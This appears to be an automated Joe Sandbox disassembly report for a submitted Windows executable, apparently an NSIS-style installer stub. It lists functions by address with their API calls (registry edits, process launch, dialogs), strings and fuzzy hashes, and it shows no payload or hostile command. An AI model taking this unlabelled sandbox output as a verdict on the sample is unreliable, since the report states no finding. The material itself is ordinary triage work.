Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction ID: 811e074b116e6ce6d11e192741490be2760717d42b69e64a674173994bb84636
Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction Fuzzy Hash: 4E014C71D00219BADB00DBA4DC85FFEBBB8AB59711F10052ABA00B61D0D7B8A9058BA5

Function 00402B3B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
MulDiv.KERNEL32(0005E600,00000064,?), ref: 00402B81
wsprintfA.USER32 ref: 00402B91
SetWindowTextA.USER32(?,?), ref: 00402BA1
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB3

Strings

verifying installer: %d%%, xrefs: 00402B8B

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: bd1d3871bc3dbc50f966d73cf0113ae7f1e1d2dda644773975aa317f12337262
Instruction ID: e41715c37a5330c5740685503c003044c4943c79b663b03d39d41db920bc543d
Opcode Fuzzy Hash: bd1d3871bc3dbc50f966d73cf0113ae7f1e1d2dda644773975aa317f12337262
Instruction Fuzzy Hash: 34014470A00209ABDB249F60DD09EAE3779AB04345F008039FA16B92D1D7B49A559F99

Function 00402A36 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A57
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
RegCloseKey.ADVAPI32(?), ref: 00402A9C
RegCloseKey.ADVAPI32(?), ref: 00402AC1
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 32cdae671697de7973d8bb2633bc31189b6b536a9ce7c2939538a07c10ae524a
Instruction ID: 582bceb6e4b24316922a1ee6e85d565da044e62c79b522cd3b8563d0d5e38007
Opcode Fuzzy Hash: 32cdae671697de7973d8bb2633bc31189b6b536a9ce7c2939538a07c10ae524a
Instruction Fuzzy Hash: E7111771A10049BEEF31AF90DE49DAF7B7DEB44345B104036F906A10A0DBB49E51AF69

Function 00401CC1 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401CC5
GetClientRect.USER32(00000000,?), ref: 00401CD2
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CF3
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
DeleteObject.GDI32(00000000), ref: 00401D10

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 040e4684e74ef7b69d4f9af20bee9e4e1a156ef82e91de0239870d1665a1d994
Instruction ID: c9eade559dcb8dabe12f7fb8fefc2ecb3bb817c4e851fb83d30c8e131ed4808d
Opcode Fuzzy Hash: 040e4684e74ef7b69d4f9af20bee9e4e1a156ef82e91de0239870d1665a1d994
Instruction Fuzzy Hash: B5F01DB2E04105BFD700EFA4EE89DAFB7BDEB44345B104576F602F2190C6789D018B69

Function 00404568 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00420478,00420478,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404488,000000DF,0000040F,00000400,00000000), ref: 004045F6
wsprintfA.USER32 ref: 004045FE
SetDlgItemTextA.USER32(?,00420478), ref: 00404611

Strings

%u.%u%s%s, xrefs: 004045E0

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 1fe6c35c0a5c12af0758eda6fcd91f800dae708434e3b464b1985a7a483ce98e
Instruction ID: de100ae33fd703a766e80fabf1c0ef7e237f6bef08e04a4196497c65211e5d03
Opcode Fuzzy Hash: 1fe6c35c0a5c12af0758eda6fcd91f800dae708434e3b464b1985a7a483ce98e
Instruction Fuzzy Hash: 331104B370012477DB10666D9C05EAF329DDBC6334F14023BFA2AF61D1E9388C1186E8

Function 00401BAD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25

Strings

!, xrefs: 00401BE1

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: a21e9fedaf10b3d0faf8ff8eb7872d1ba6ab3a41dfe2fcd52b90142743086bd6
Instruction ID: 089b6e11c3ee5c2ceb15467343933f82bc3488a694e04e66c57418204d538f9a
Opcode Fuzzy Hash: a21e9fedaf10b3d0faf8ff8eb7872d1ba6ab3a41dfe2fcd52b90142743086bd6
Instruction Fuzzy Hash: B321C4B1A44209BFEF01AFB4CE4AAAE7B75EF40344F14053EF602B60D1D6B84980E718

Function 0040523D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422480,Error launching installer), ref: 00405262
CloseHandle.KERNEL32(?), ref: 0040526F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040523D
Error launching installer, xrefs: 00405250

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
API String ID: 3712363035-1560902751
Opcode ID: 1f2f9ff3088062fdf2c67fe66ccdb0f341c5896b9e6aafa6ba1adbb34377fffc
Instruction ID: 0a3d69d2a3401d9d63374a1600280413a6fd3692a6ba6d2da32d4f839eaa01ec
Opcode Fuzzy Hash: 1f2f9ff3088062fdf2c67fe66ccdb0f341c5896b9e6aafa6ba1adbb34377fffc
Instruction Fuzzy Hash: BEE0E674A1010ABBDB00EF64DD09D6B7B7CFB00304B408621E911E2150D774E4108A79

Function 004054D0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004054D6
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004054DF
lstrcatA.KERNEL32(?,00409010), ref: 004054F0

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004054D0

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-297319885
Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
Instruction ID: 18d73bba3a4f2c077241afd2b81ba446c35da1b9bd2d8ef2eba9fb39a34af30a
Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
Instruction Fuzzy Hash: 09D0A7B2505970AED20126195C05FCF2A08CF023117044423F640B21D2C63C5C819BFD

Function 00401F51 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F7C

Part of subcall function 00404D7B: lstrlenA.KERNEL32(0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
Part of subcall function 00404D7B: lstrlenA.KERNEL32(00402F8B,0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
Part of subcall function 00404D7B: lstrcatA.KERNEL32(0041FC50,00402F8B,00402F8B,0041FC50,00000000,0040F020,00000000), ref: 00404DD7
Part of subcall function 00404D7B: SetWindowTextA.USER32(0041FC50,0041FC50), ref: 00404DE9
Part of subcall function 00404D7B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
Part of subcall function 00404D7B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
Part of subcall function 00404D7B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 9b564887ea250fec720acf1d14385518bd2ff36926a3d3c154242c6b74caae1f
Instruction ID: d4347cebb671b603d0a5d412fc90ce50d757f993dc699470b494ace3858b78d6
Opcode Fuzzy Hash: 9b564887ea250fec720acf1d14385518bd2ff36926a3d3c154242c6b74caae1f
Instruction Fuzzy Hash: 7221EE72D04216ABCF107FA4DE89A6E75B06B44359F204337F611B52E0D77C4941965E

Function 00402303 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402341
lstrlenA.KERNEL32(0040A350,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402361
RegSetValueExA.ADVAPI32(?,?,?,?,0040A350,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040239A
RegCloseKey.ADVAPI32(?,?,?,0040A350,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040247D

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: 6b11f334dbbc8ef6b513b490cfc72df03ea8b8722a4b50408d6dca900db2c3ad
Instruction ID: 0c84a363429982d99d3a5a271a87b4b8d308e401ccf86a25fc22d5166c0076e5
Opcode Fuzzy Hash: 6b11f334dbbc8ef6b513b490cfc72df03ea8b8722a4b50408d6dca900db2c3ad
Instruction Fuzzy Hash: 781163B1E00209BFEB10AFA4DE49EAF767CFB40358F10413AF901B61D0D6B85D019669

Function 00401EC5 Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24

Part of subcall function 0040593B: wsprintfA.USER32 ref: 00405948

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: f9744f7992f8663f166aa538b3da0bee02a0a5d08582e8cd95fa90b08a46e0f1
Instruction ID: 4f4abe4324f754641e01f0e672b51484e064b7e428c6eed24e296c4d37409401
Opcode Fuzzy Hash: f9744f7992f8663f166aa538b3da0bee02a0a5d08582e8cd95fa90b08a46e0f1
Instruction Fuzzy Hash: 5F114CB2901109BFDB01EFA5D981DAEBBB9EF04354B20803AF501F61E1D7389A55DB28

Function 00401D1B Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D22
GetDeviceCaps.GDI32(00000000), ref: 00401D29
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
CreateFontIndirectA.GDI32(0040AF54), ref: 00401D8A

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: 78f79da71c4801185515a33ee10eecec6988933ac577fdebba6a0d8b1e27de8a
Instruction ID: 822a585a95499be2ccb46a886614a983d19f7779af01092212c1c8a44adbdb5d
Opcode Fuzzy Hash: 78f79da71c4801185515a33ee10eecec6988933ac577fdebba6a0d8b1e27de8a
Instruction Fuzzy Hash: 80F04FF1A49742AEE70167B0AE0AB9A3B659719306F14043AF242BA1E2C5BC0454DB7F

Function 00402BBE Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402D9E,00000001), ref: 00402BD1
GetTickCount.KERNEL32 ref: 00402BEF
CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C0C
ShowWindow.USER32(00000000,00000005), ref: 00402C1A

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: bf07767b331bb76d3b5a2f8e5622a218379b171e4cdb58aec93dcc8b8375aee9
Instruction ID: f2d052a30a3472248e345e5832336eca953f0b1533712f6c56216133e551431f
Opcode Fuzzy Hash: bf07767b331bb76d3b5a2f8e5622a218379b171e4cdb58aec93dcc8b8375aee9
Instruction Fuzzy Hash: 2AF0DA31D09320ABC661AF14FD4CADB7B75BB09B127014936F101B52E8D77868818BAD

Function 004037EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(00000000,00423680), ref: 00403887

Strings

1033, xrefs: 004037F3, 004037FD, 0040386E
C:\Users\user\AppData\Local\Temp\, xrefs: 004037F0

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

